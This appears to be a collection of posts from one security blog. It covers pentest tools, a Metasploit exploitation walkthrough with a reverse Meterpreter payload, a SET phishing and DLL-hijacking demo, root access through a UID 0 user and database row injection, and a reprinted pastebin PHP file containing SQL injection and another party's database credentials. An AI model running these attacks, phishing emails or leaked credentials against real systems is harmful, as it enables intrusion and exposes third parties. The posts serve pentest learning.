w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.  This project is currently hosted at SourceForge , for further information, you may also want to visit w3af SourceForge project page . You can also watch a few video demos over at  w3af video demos!

I have used this application before on the BackTrack Linux pentesting distro, but at the time it was still being improved and it was really buggy; so I am really happy to see that a new release is out and I cant wait to start testing.

In this latest release, we bring you a couple of the most
important improvements of our framework:

* Stable code base, an improvement that will reduce your w3af
crashes to a minimum. We’ve been working on fixing all of our
long-standing bugs, wrote thousands of lines of doctests and various
types of automation to make sure we can also keep improving without
breaking other sections of the code.

* Auto-Update, which will allow you to keep your w3af
installation updated without any effort. Always get the latest and
greatest from our contributors!

* Web Application Payloads, for people that enjoy exploitation
techniques, this is one of the most interesting things you’ll see in
web application security! We created various layers of abstraction
around an exploited vulnerability in order to be able to write
payloads that use emulated syscalls to read, write and execute files
on the compromised web server. Keep an eye on the rapid7 community
blog an entry completely dedicated to this subject!

* PHP static code analyzer, as part of a couple of experiments
and research projects, Javier Andalia created a PHP static code
analyzer that performs tainted mode analysis of PHP code in order to
identify SQL injections, OS Commanding and Remote File Includes. At
this time you can use this very interesting feature as a web
application payload. After exploiting a vulnerability try: “payload
php_sca”, that will download the remote PHP code to your box and
analyze it to find more vulnerabilities!

And many others, such as:

* Refactoring of HTTP cache and GTK user interface code to
store HTTP requests only once on disk (5% performance improvement)
* Performance improvement in sqlite database by using indexes
(1% performance improvement)
* Huge w3af code-base refactoring on how URLs are handled.
Moved away from handling URLs as strings into a url_object model. This
reduces the number of times a URL is parsed into its component pieces
(protocol, domain, path, query string, etc.) and put back together
into a string, which clarifies the code and makes it run faster.

We have a stable release, w0000t! Hmmmm…. have we finished? Should
we go home? No! We still have work to do; there are still features and
capabilities we’d like to add. For example,as you read this, we’re
working on integrating the multiprocessing module into w3af’s code,
with the objective of using more than one CPU core at the same time
and substantially improve our scanning speed. We’re also working on
handling of encodings by the use of unicode strings across the whole
framework, and making the user experience more intuitive in the UI.

As usual, you can get the latest installable packages from the
w3af.com [0] website! Just download and enjoy our latest improvements!

[0] http://w3af.sourceforge.net/#download

To go a step further checkout the documentation and other resources on the tool:

Official documentation:

• The w3af user’s guide can be found here .
• A French translation of the users guide made by Jerome Athias can be found here .
• The epydoc documentation for w3af can be found here .
• The presentation materials used at the T2 conference can be found here .

External resources:

• Josh Summit wrote a two part tutorial of w3af on his blog: 1 , 2 .
• Fuzion wrote a windows installation tutorial on his blog .

How many times have you fired off a Nessus scan and then after finding the goodies you have to go to either ExploitDB , or a similar site in search for a exploit. Or if you are a pro then its off to go and write your own exploit for the newly discovered vulnerability.

Today’s post will focus on what to do after you have scanned that vulnerable system and found a juice vulnerability. If this is the first time you have heard of ExploitDB or Metasploit you should first visit the Metasploit Unleashed training site.

Lab setup

• Backtrack 4 Linux VM
• Windows 2003 server with a  vulnerable web app

Below are the necessary steps to get from a Nessus scan to the correct Metasploit module for  exploiting your system.

Step one: Install Nessus

You can download your copy of nessus from HERE and don’t forget to register for a homefeed license. Now create your scan policy or used from one of the default policies. I selected the web application policy since the target server was running and outdated web application.  Once your scan is completed download the report and save it in a .nessus format.

Step two: Launching  Metasploit

Login to your machine of choice, in my case its my BackTrack4 Linux VM. Issue the following commands to load Metasploit:

• cd /pentest/exploits/framework3 (change directory to your metasploit installation dir)
• ./msfconsole
• svn up (to get the latest update)

Step three: DB Magic

At this stage you will need to create a DB, import the scanned nessus report, and then perform your hacking kungfu with the db_autopwn command.

msf > db_create

msf > db_connect
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don’t count on it
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

db_import /pentest/results/nessus_report_TestSrvr.nessus
msf > db_import /pentest/results/nessus_report_Appsrvr.nessus
[*] Importing ‘Nessus XML (v2)’ data
[*] Importing host 10.10.0.19
[*] Successfully imported /pentest/results/nessus_report_TestSrvr.nessus

db_autopwn -t -x

This command will search Metasploit for any exploits that matches your various vulnerability from the Nessus report, it will not automatically run the exploit for our unless you use the -e option. In most cases if you are testing this against a live system then you should leave out the -e option to avoid crashing your server.

msf > db_autopwn -t -x
[*] Analysis completed in 10 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   10.10.0.19:445  exploit/windows/smb/psexec  (CVE-1999-0504, OSVDB-3106)
[*]   10.10.0.19:80  exploit/windows/http/apache_mod_rewrite_ldap  (CVE-2006-3747, BID-19204, OSVDB-27588)
[*] ================================================================================
[*]
[*]

From this point I have two exploits to choose from:

msf > use exploit/windows/http/apache_mod_rewrite_ldap
msf exploit(apache_mod_rewrite_ldap) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apache_mod_rewrite_ldap) > set LHOST 10.10.0.17
LHOST => 10.10.0.17
msf exploit(apache_mod_rewrite_ldap) > set RHOST 10.100.0.9
RHOST => 10.100.0.9
msf exploit(apache_mod_rewrite_ldap) > exploit

From this point on its GAME OVER!

References:
http://www.metasploit.com/modules/exploit/windows/smb/psexec
http://www.metasploit.com/modules/exploit/windows/http/apache_mod_rewrite_ldap
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.tenable.com/products/nessus/documentation

I  will be joining the guys over at the   Linux Basix podcast tonight and below are some of the things I intend to discuss.

Discussion Links:

1. 7 Best Network Security Linux Distributions (DoortoDoor): A list of special purpose distros [BackTrack, Network Security Toolkit(NST),Pentoo, nUbuntu(Network Ubuntu),Security Tools Distribution(STD),Helix,Damn Vulnerable Linux]. These distributions are mainly designed to perform network security tasks such as vulnerability assessment and penetration testing in order to prevent and monitor unauthorized entry, abuse, alteration, or denial of computer network resources. Since most of these distros are available as Live CDs, you could instantly try or use them without hard disk installation. Read more over at http://www.junauza.com/2011/01/network-security-linux-distros.html
   
2. Soundminer: A Stealthy and Context-AwareSound Trojan for Smartphones: Researchers have developed a low-profile Trojan horse program for Google’s Android mobile OS that steals data in a way that is unlikely to be detected by either a user or antivirus software. The malware, called Soundminer, monitors phone calls and records when a person, for example, says their credit card number or enters one on the phone’s keypad, according to the study.Using various analysis techniques, Soundminer trims the extraneous recorded information down to the most essential, such as the credit card number itself, and sends just that small bit of information back to the attacker over the network, the researchers said. Read more over at http://www.csoonline.com/article/656264/soundminer-android-malware-listens-then-steals-phone-data

Tech Segment: Password reset the hard way

Problem: I was tasked with retrieving or resetting the web login password to a Linux based custom build system, very similar to an appliance. I currently had limited shell access to the system however I was not certain if the password was stored in /etc/passwd or in some sort of database on the system.

**Before we begin just know that everything mentioned here will probably not work on a normal Ubuntu based system, the manufacture possibly used their know custom Kernel and other system tweaks.**

Commands used:

1. netstat – a command-line tool that displays network connections, routing tables, and a number of network interface statistics.
2. fuser – a command line tool to identify processes using files or sockets.
3. lsof – a command line tool to list open files under Linux / UNIX to report a list of all open files and the processes that opened them.
4. /proc/$pid/ file system – Under Linux /proc includes a directory for each running process (including kernel processes) at /proc/PID, containing information about that process, notably including the processes name that opened port.
5. uname- Print name of current system

Phase one “Getting to know the system”:

I started off with a few simple commands to try and identify what various of Linux was the system running:

uname -a (Verify what kernel version I was up against)

yum (To see if it was a Fedora based system)

apt-get (To see if it was an Ubuntu based system and it was)

cat /etc/issue (To check what flavor of Ubuntu, turned out it was “Ubuntu 8.04″)

Next I wanted to get Root access without resetting the Root account password. I figured this would prevent me from having to deal with any restrictions issues.

Created a user called testuser
user@host:~$ sudo adduser testuser

Edit the password file and changed UID and GID to that of root (testuser:x:0:0)
user@host:~$ sudo nano /etc/passwd

Then once  I logged in newly created testuser and I am automatically given root access.
user@host:~$ su – testuser

Since I know that the service I am interest is running on port 443, I will run  few  commands to get a better ideal of whats really going on with this port.

Netstat to view the connection stated and PID for the services running on port 443:

root@host:~# netstat -tulpn | grep 443

tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      5548/pound

To confirm the processes PID use the fuser command:

root@host:~# fuser 443/tcp
443/tcp:              5548  5549

To find out process name and working directory associated with PID # 5548, enter:

root@host:~# ls -l /proc/5548/exe
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/exe -> /opt/pound/sbin/pound

root@host:~# ls -l /proc/5548/cwd
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/cwd -> /opt/app_name/rails/ssl

Now I have an application name and working directory to go investigate. After further research I found out that Pound is a reverse-proxy load balancing server, and the config file showed me it was passing all connection on port 443 to another port on the same server.

I then used lsof to further investigate the newly discovered port:

root@host:# lsof -Pnl +M -i4
mongrel_r 5623      112    3u  IPv4  14528       TCP 127.0.0.1:3000 (LISTEN)

Then to find out the processes own:
root@host:# ps aux | grep 5623

app_user      5623  0.0  1.3  40048 28536 ?        Sl   14:14   0:02 /usr/bin/ruby1.8 /usr/bin/mongrel_rails start -d -e production -p 3000 -a 127.0.0.1 -P log/mongrel.3000.pid –user app_user –group app_name

A bit more research and I found out what mongrel_rails was. Mongrel is a fast HTTP library and server for Ruby that is intended for hosting Ruby web applications of any kind using plain HTTP rather than FastCGI or SCGI.

After poking around a bit more I notice the tie in with a postgres SQL server that I notice in a few earlier commands. Now on to the fun part!

Phase two “Modifying the system”:

Now that I have realized that the system has a database, and the user account is not location in the /etc/passwd file its time to access database identify the user account and make some modifications.

su – postgres to change to the postgres SQL user:
root@host:~# su – postgres

Launching PostgresSQL interactive terminal:
postgres@piab:~$ psql

List all the roles and Superusers :
postgres-# \du
List of roles
Role name | Superuser | Create role | Create DB | Connections | Member of
———–+———–+————-+———–+————-+———–
postgres  | yes       | yes         | yes       | no limit    |
App_User  | no        | no          | no        | no limit    |
(2 rows)

List all database on the system:

postgres=# \l
List of databases
Name    |  Owner   | Encoding
———–+———-+———-
postgres  | postgres | UTF8
App_Name  | postgres | UTF8

Connect to a database:
postgres=# \c App_Name

List of tables:
App_Name=# \dt

Schema |        Name        | Type  | Owner
——–+——————–+——-+——-
public | schema_info        | table | App_User
public | users              | table | App_User

Query table users:
select * from users;

Fields of interest to me were (id, login, email, password, salt_val,passwd_create,passwd_updated)

Now before I went any further I ensured to dump the DB using pg_dump and pg_dumpall
postgres@host:~$ pg_dump dbname > /tmp/dbname.out
postgres@host:~$ pg_dumpall > /tmp/db.out

At this point I had a few options:

• Try to reverse the password encryption and salting mechanism
• Try to find the code that handles the authentication and bypass that
• Get access to another box, create a password and copy that hash and encrypted value over to the DB on the other system.

Luckily for me I had access to another device so I  created a password there, and queried that DB and copied over the encrypted password and hash into notepad then used an insert statement to add to the values to the db along with a test user.

Connected back to the DB:
postgres=# \c App_Name

Insert new records:
INSERT INTO users (id,login,email,password,salt_val,created_at) values (’2′,’demo’,'demo@localhost’,’9abdgagf42324243240fdbd’,’8d5d6cd8fa6a0323jb3240988324′,’2006-12-05 21:15:32′);

Went back to the login portal https://ipaddress and bingo! Big shout out to byte_bucket over at irc.freenode.net #pauldotcom, he was very helpful in helping me work through this.

Additional reading:

http://www.cyberciti.biz/faq/what-process-has-open-linux-port/

http://linux.die.net/man/8/pound

http://linux.die.net/man/1/pg_dump

https://support.eapps.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=180

http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/

Being a father of four with my oldest already at the age where he needs to use the computer I started asking myself do I have the ideal setup? And the answer was not really. Don’t get me wrong I have a PF sense firewall and a few other protections in place however I wanted to build a solution from the ground up instead of just installing a bunch of  packages on my firewall and not really understanding whats going on in the back end.

My proposed solution is to have a system that caches and scans web traffic for viruses as well as preform some sort of content filtering  based on various detection methods (phrase matching, PICS filtering and URL filtering etc) and most importantly the solution must be **FREE** to implement. I am sure the are other solutions in place that does a better job than the one I have outlined and by all means feel free to comment or email me.

Tools I plan on using:

• FreeBSD 8.1
• ClamAV
• Squid
• Dansguardian
• Privoxy
• HAVP

FreeBSD: If you are going to choose an OS I would suggest BSD, because in my opinion its one of the most secure and well build system out there.

ClamAV: Is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates.

Squid: Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages.

Dansguardian: Is an award winning Open Source web content filter which currently runs on Linux, FreeBSD, OpenBSD, NetBSD, Mac OS X, HP-UX, and Solaris. It filters the actual content of pages based on many methods including phrase matching, PICS filtering and URL filtering. It does not purely filter based on a banned list of sites like lesser totally commercial filters.

Privoxy: Is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes.

HAVP (HTTP AntiVirus proxy): is a proxy with an anti-virus filter. It does not cache or filter content.

Setup Phase

The first thing you need to do before you start installing your apps is to make sure you set a static address up on your BSD box, in my case I have freeBSD 8.1:

vi /etc/rc.conf and add the following lines, my gateway was 192.168.1.1 and IP 192.168.1.5

defaultroute=”192.168.1.1″
hostname=”bsdsrvr.infolookup.com”
ifconfig_le0=”192.168.1.5 netmask 255.255.255.0″
inetd_enable=”YES”

I would also run freebsd-update fetch and  freebsd-update install since it never hurts to have an updated repo. Now this is as far as I will go with this post, in my next post I will go through the install, config and testing. Comments and suggestions are always welcome.

–Sherwyn AKA Infolookup

References

http://www.br.freebsd.org/where.html

http://www.clamav.net/lang/en/

http://www.server-side.de/

http://www.privoxy.org/

http://wiki.linuxmce.org/index.php/Installing_Dansguardian

http://www.mustnofee.com/tutorials/37-tutorials/67-setting-up-squid-on-freebsd

http://bsdmag.org/

http://www.squid-cache.org/

the below Post came through Full Disclosure mailing this today and I figured for something this interesting it merited a re-post.

Month of Abysssec Undisclosed Bugs – Day 1 From: muts
Date: Wed, 01 Sep 2010 15:21:34 +0200

Hi Lists,

The Abysssec Security Team has started its Month of Abysssec undisclosed
bugs (MOAUB).

During this month, Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc.

The exploits, papers and PoCs will be featured on the Exploit-Database (http://www.exploit-db.com), averaging one 0day and one binary analysis a day.

Get your hard-hats on, your VM¹s and debugging tools organized ­ it’s going to be a an intensive ride.

Posted today – MOAUB Day 1:

1– http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/

2 – http://www.exploit-db.com/moaub-1-cpanel-php-restriction-bypass-vulnerability/

Enjoy,
Abysssec and the Exploit Database Team

Since these are going to be mostly 0-days or currently unpatched vulnerabilities, it might be time to update to the latest versions of your various applications. Lastly if you have not been looking at your various logs, and consoles this week might be a good time to start.

I have to admit that I am a bit late to the party, but I see this as an opportunity to try out SET and learn a bit about the DLL hijacking issue at the same time.

Last Thursday, Acros, a Slovenian security firm, published an advisory that identified what they call a “binary planting” flaw in iTunes. Essentially, if you open a file type associated with iTunes from a remote network share, iTunes will also try to load one more DLLs from the share. Even if the file that the user opened is completely safe, a malicious DLL can be supplied that will lead to code execution.

HD Moore stated “While working on the Windows Shortcut exploit, he stumbled on this class of bugs and identified a couple dozen applications that seemed to be affected by this problem.  iTunes was one of these applications and the details in the Acros advisory made it clear that this was indeed the same flaw. He was planning to finish the advisories and start contacting vendors on August 20th (last Friday). The  Acros advisory on the 18th threw a wrench into this process.

Microsoft later release the following details  in an advisory:

Microsoft is aware that research has been published detailing a remote attack vector for a class of vulnerabilities that affects how applications load external libraries.

This issue is caused by specific insecure programming practices that allow so-called “binary planting” or “DLL preloading attacks”. These practices could allow an attacker to remotely execute arbitrary code in the context of the user running the vulnerable application when the user opens a file from an untrusted location.

This issue is caused by applications passing an insufficiently qualified path when loading an external library. Microsoft has issued guidance to developers in the MSDN article, Dynamic-Link Library Security, on how to correctly use the available application programming interfaces to prevent this class of vulnerability. Microsoft is also actively reaching out to third-party vendors through the Microsoft Vulnerability Research Program to inform them of the mitigations available in the operating system. Microsoft is also actively investigating which of its own applications may be affected.

In addition to this guidance, Microsoft is releasing a tool that allows system administrators to mitigate the risk of this new attack vector by altering the library loading behavior system-wide or for specific applications. This advisory describes the functionality of this tool and other actions that customers can take to help protect their systems.

Mitigating Factors:

• This issue only affects applications that do not load external libraries securely. Microsoft has previously published guidelines for developers in the MSDN article, Dynamic-Link Library Security, that recommend alternate methods to load libraries that are safe against these attacks.
• For an attack to be successful, a user must visit an untrusted remote file system location or WebDAV share and open a document from this location that is then loaded by a vulnerable application.

• The file sharing protocol SMB is often disabled on the perimeter firewall. This limits the possible attack vectors for this vulnerability.

Demo Time with SET… Thanks to Dave for his wonderful video that he posted this afternoon, I can now use this as my base for this demo.

What is SET?

The Social-Engineer Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a practice that not many people perform. You can download the Social-Engineering Toolkit through subversion by simply typing this in Back|Track 4 or any other Linux OS.

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

However BT4 now comes with SET located under /pentest/exploits/set, from here you can simply launch SET with a ./set and get your latest updates by selecting option 8.

SET can do tons of cool stuff and I have included a few links at the end of this post that explains them in details, and I have a few post to come that will also go into some more details. However for todays demo I will only be using a few of those features.

Launch and update SET

If you are using BackTrack4 you can find SET located under /pentest/exploits/set, you can launch it with ./set and as stated above select option 8 to get the latest and greatest updates.

Choose your path to pwnage

I selected Option 2 or “Web Attack  Vectors” which is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Select option 2 once more “The Metasploit Browser Exploit Method” this method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

And yet again select option 2, “Site Cloner” this method will completely clone a website of your choosing and allow you to utilize the attack vectors within the same web application you were attempting to clone.

Choosing your browser Exploit:

At this point you have several options to choose from, today we will be picking option 1 “Microsoft Windows WebDAV Application DLL Hijacker”.

Choosing your Payload:

Once more you are giving several options, I choose option 2 “Windows Reverse_TCP Meterpreter“, this payload  will spawn a meterpreter shell on the victim and send it back to the attacker.

Once you are done, you have to choose your vulnerable extension types if you are not certain select enter to choose the defaults, or find a semi-complete list over at exploitdb . At this point the malicious iframes are infected into the cloned website and awaits your victim.

SET Mass E-Mailer Option :

There are two options on the mass e-mailer,we are choosing option1 this option will allow you to send an email to one individual person. Once you are done you have to choose who you would like to send the phishing email too, and who is your sender lastly figure if you would like to use Gmail, your own mail server or some open relay server.

Next think of something clever as a email subject and body. A good example would be to clone a local web-based system from your attacker network and send an email saying “we are doing some updates kindly click to verify you can access this test link. After you are finish click Ctrl + C and hit enter to complete this step. You will then receive a message stating that SET has already sent the email. Now is just a matter of waiting on your victim to click the email and check out the vulnerable files via the network share.

Exploit in action..

Once your victim clicks on the link, the  will be presented with the cloned site at first then the exploit will begin doing its thing in the background. Shortly after the user will be presented with a network share with the vulnerable files. After opening up the file  it  its Game Over.

Since the initial reporting of this issue, many researchers have came out with several ways of doing this so far some of my favorites are:

• Using msfconsole courtesy of the guys HDM in this post.
• Using msfpayload courtesy of Matt over at http://www.attackvector.org/alternative-dll-hijacking-method/
• Yet again Matt demoing using msfpayload + autorun usb stick  http://www.attackvector.org/autorun-dll-hijacker-usb-stick/

I have tested several of these and noticed that MSE AV was effective in identifying the msfpayload file, however using the standard method I successful exploited both windows XP and Windows 7.

Reference links:

http://www.exploit-db.com/exploits/14726/

http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

http://blog.rapid7.com/?p=5325

http://www.securityfocus.com/archive/1/513190

http://www.microsoft.com/technet/security/advisory/2269637.mspx

http://www.vimeo.com/14403642

http://www.secmaniac.com/

http://www.offensive-security.com/offsec/microsoft-dll-hijacking-exploit-in-action/

http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit

This is just going to be a short writeup on something I figure was worth mentioning. While going through pastebin I found the following entry  3 seconds after it was posted–> http://pastebin.com :

<?php

include ‘top.php’;

include ‘submenuhonorshall.php’;

/*SELECT * FROM TABLE WHERE field =

*/

$db = ‘gnemi_addison’;

mysql_connect(“gnemi.php-corner.com”, “gnemi_root”, “ignurupi87″) or die(mysql_error());

mysql_select_db($db) or die(mysql_error());

?>

<div id=”content”>

<h1>Honors Hall Library</h1>

<form method=”post”>

<p class=”norm”>

<select name=”searchby”>

<option value=”Author_First_Name”>Author First Name</option>

<option value=”Author_Last_Name” selected=”selected”>Author Last Name</option>

<option value=”Title”>Title</option>

</select>

<input type=”text” name=”query” />

<input type=”submit” value=”Submit!” />

</p>

</form>

<?php

$result = mysql_query(“SELECT * FROM `library` WHERE `’” . $_POST['searchby'] . “‘` = ‘” . $_POST['query'] . “‘ ORDER BY `Title` LIMIT 20″);

while ($row = mysql_fetch_array($result))

{

echo $row['Last Name'] . $row['First Name'] . $row['Title'] .$row['inout'];

}

?>

<?php

include ‘../address.php’;

include ‘../phptemplates/bottomhall.php’;

?>

Now to the average person that’s not a big deal, but to me after looking at that bit of php code the following questions came to mind:

• Would I find anything useful if I were to Google the various pages referenced in that code or maybe the domain “gnemi.php-corner.com”?
• What if I ran a whois lookup against that domain what would I find?
• What if I Google the email addresses associated with that domain?
• And most importantly are the username and password referenced stilling being used currently?
• Are those tables and DB name real or just test names?
• Would I find anything interesting if I were to crawl that website?

Now a simple whois returned a valid email address along with some other useful information:

And just out of curiosity after visiting http://gnemi.php-corner.com/godWindow/ I was presented with the following:

Now I ***DID NOT LOGIN*** I repeat  ***DID NOT LOGIN*** so I don’t know if those credential are valid BUT what if the were? I am hoping for this person’s sake all of the above information is just for testing purposes but what if its no? Sanitizing all valid  information before posting it would have been nice.

I was recently working on a Ezproxy deployment project, and after having to jump between several pages on the http://www.oclc.org/ website I decided to put together this guide for anyone that has to do an Ezproxy deployment and wanted to find everything in one place.

What is EZproxy?

EZproxy helps provide users with remote access to Webbased  licensed content offered by libraries. It is middleware  that authenticates library users against local authentication  systems and provides remote access to licensed content based on the user’s authorization.

Below are the necessary steps needed to backup the configuration on a router or switch using the NetMRI appliance. Steps 1-4 are the starting point for executing any jobs via the configuration manger, other scripts might require a few more steps.

1. Log into the NetMRI appliance http://netmri
2. Click on the “Configuration Management” tab

   

3. Click on the “Job Management” sub tab on the left à then select the scripts tab and the script to backup the IOS config is called “Backup IOS Config”.

   

4. Before you execute this you have to ask yourself if you want to create a schedule job or if you want to just run the job right now. If you chose to run the job right now follow the below steps:
   1. Click on the “Run Now” action
   2. Select the devices that you would like backup by either choosing the group “routing/switching” under the “Device Groups” tab or select the one or multiple devices from the “Devices” tab the select the “Run” button.

      Option A
      

   Option B

Click on the device tab and select the devices manually that would like the script to target.

1. Lastly enter the name/IP Address of the TFTP server that you would like to backup the config files too, and press OK.

   

   Click OK to proceed!

2. Once the job has been completed you will either see a red X in the status tab and the message error indicating that one or more jobs has not been processed.

   

Just click on the job name ,then the details tab and look for the device that has the error. You can then click on the “error” link for further details as to why the job did not run on the device in question.

Next click on the status log tab to  look at the detail error, in this case the NetMRI appliance was unable to connect to SW02 via SSH since this switch does not support SSH.

Note:

You can also schedule these jobs instead of running then manually, have fun and remember to backup your configs, cause you never know when you will need them.

Today I attended an “Intro to Web Application Hacking” class hosted by http://twitter.com/alphaonelabs hackerspace and sponsored by OWASP. This is the first class of its kind that I have attended, so I will do a short writeup on what I learned today.

For starters everyone was excepted to show up with  the following installed:

• Linux
• VirtualBox or a VM containing windows XP
• IE6 or IE7 with these plugins: Fiddler, Tamper IE and Web Scarab
• FireFox with these plugins: XSS Me, SQL Inject Me and Hacker Bar

A one time use VM may be provided for attendees on premises for anyone who didn’t get a chance to install the required applications.

The presenter began by going over the agenda for the day then quickly moved into the fun hands on portion, and as mentioned several times in the class today “only proform these test on a site that you have been given permission” to test.

Below are  list of sites that were used today in class, and are publicly available for anyone wanting to practice there web testing kung fu:

http://demo.testfire.net

http://www.bayden.com/sandbox/shop

http://www.fiddler2.com/sandbox/shop

http://testaspnet.acunetix.com

http://zero.webappsecurity.com

You can also setup your own environment at home by using any of the following:

Damn Vulnerable Web App  by http://twitter.com/ethicalhack3r –> http://www.dvwa.co.uk/download.php

Mutillidae by http://www.irongeek.com –> www.irongeek.com/downloads/mutillidae1.3.zip

The first exercise was simply running THC SSLCHECK , THC SSL Check is a small tool that checks the remote SSL stack for supported ciphers and versions. Useful for pen-testing for weak SSL configuration discovery. This is a command line tool that runs on Windows

Fig 1

As you can see from the above image the host is not using SSLv2 and for good reasons since they are a few security related issues that pertains to this version. If you look a bit closer you will see the host is also using 128 bit encryption which shows that someone knows what the are doing.

Next we went on to test a few demo shopping sites by using Tamper IE to change the price of the item from the intended price to one of our liking. Before performing this test you have to insure that you configure Tamper IE to tamper with both POST and GET request.

Demo  site used: http://www.bayden.com/sandbox/shop

Original item price for the Laptop was $1095

Fig2After hitting the checkout button on the demo site you will be prompted with the Temper IE edit request box. Click the” PretyPost” button then click on the cost line and just type in the price you would like to pay for the Laptop, I choose $95 and I also changed the quantity to 2, lastly click “send alerted data” to complete your request.

Fig 3

Fig 4

As you can see in the end I paid what I desired instead of what the item was listed for. The later end of the class was about Q&A as well as using XSS ME/SQL Inject Me as well as http://ha.ckers.org/sqlinjection/ to try and break into http://demo.testfire.net.

For an intro class I  have to say I didn’t except to learn so much, so special thanks to Alphaone Labs!